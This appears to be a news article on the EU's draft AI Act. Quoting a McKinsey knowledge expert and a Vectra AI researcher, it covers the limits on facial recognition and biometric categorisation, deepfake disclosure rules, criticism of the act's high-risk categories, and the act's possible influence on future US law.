Malin Strandell-Jansson, senior knowledge expert at McKinsey & Co, says facial recognition is one of the most debated issues in the draft act, and the final outcome is not yet clear.

In its draft format, the AI Act strictly prohibits the use of real-time remote biometric identification in publicly accessible spaces for law enforcement purposes, as it poses particular risks for fundamental rights – notably human dignity, respect for private and family life, protection of personal data, and nondiscrimination.

Strandell-Jansson points out a few exceptions, including use for law enforcement purposes for the targeted search for specific potential victims of crime, including missing children; the response to the imminent threat of a terror attack; or the detection and identification of perpetrators of serious crimes.

"Regarding private businesses, the AI Act considers all emotion recognition and biometric categorization systems to be high-risk applications if they fall under the use cases identified as such — for example, in the areas of employment, education, law enforcement, migration, and border control," she explains.

As such, potential providers would have to subject such AI systems to transparency and conformity obligations before putting them on the market in Europe.

**The Time to Act on AI Is Now**

Dr. Sohrob Kazerounian, AI research lead at Vectra, an AI cybersecurity company, says the need to create a regulatory framework for AI has never been more pressing.

"AI systems are rapidly being integrated into products and services across wide-ranging markets," he says. "Yet the trustworthiness and interpretability of these systems can be rather opaque, with poorly understood risks to users and society more broadly."

While some existing legal frameworks and consumer protections may be relevant, applications that use AI are sufficiently different enough from traditional consumer products that they necessitate fundamentally new legal mechanisms, he adds.

The overarching goal of the bill is to anticipate and mitigate the most critical risks resulting from the use and failure of AI, with actions ranging from banning systems deemed to have "unacceptable risk" altogether to heavy regulation of "high-risk" systems. Another, albeit less-noted, consequence of the framework is that it could provide clarity and certainty to markets about what regulations will exist and how they will be applied.

"As such, the regulatory framework may in fact result in increased investment and market participation in the AI sector," Kazerounian said.

**Limits for Deepfakes and Biometric Recognition**

By addressing specific AI use cases, such as deepfakes and biometric or emotional recognition, the AI Act is hoping to ameliorate the heightened risks such technologies pose, such as violation of privacy, indiscriminate or mass surveillance, profiling and scoring of citizens, and manipulation, Strandell-Jansson says.  

"Biometrics for categorization and emotion recognition have the potential to lead to infringements of people's privacy and their right to the protection of personal data as well as to their manipulation," she says. "In addition, there are serious doubts as to the scientific nature and reliability of such systems."

The bill would require people to be notified when they encounter deepfakes, biometric recognition systems, or AI applications that claim to be able to read their emotions. Although that's a promising step, it raises a couple of potential issues.

Overall, Kazerounian says it is "undoubtedly" a good start to require increased visibility for consumers when they are being classified by biometric data and when they are interacting with AI-generated content rather than real humans or real content.

"Unfortunately, the AI act specifies a set of application areas within which the use of AI would be considered high-risk, without necessarily discussing the risk-based criteria that could be used to determine the status of future applications of AI," he said. "As such, the seemingly ad-hoc decisions about which application areas are considered high-risk simultaneously appear to be too specific and too vague."

Current high-risk areas include certain types of biometric identification, operation of critical infrastructure, employment decisions, and some law enforcement activities, he explains.

"Yet it isn't clear why only these areas were considered high-risk and furthermore doesn't delineate which applications of statistical models and machine-learning systems within these areas should receive heavy regulatory oversight," he adds.

**Possible Groundwork for Similar US Law**

It is unclear what this act could mean for a similar law in the US, Kazerounian says, noting that it has now been more than half a decade since the passing of GDPR, the EU law on data regulation, without any similar federal laws following in the US — yet.

"Nevertheless, GDPR has undoubtedly influenced the behavior of multinational corporations, which have either had to fracture their policies around data protections for EU and non-EU environments or simply have a single policy based on GDPR applied globally," he said. "In any case, if the US decides to propose legislation on the regulation of AI, at a minimum it will be influenced by the EU act."

Tag

#mac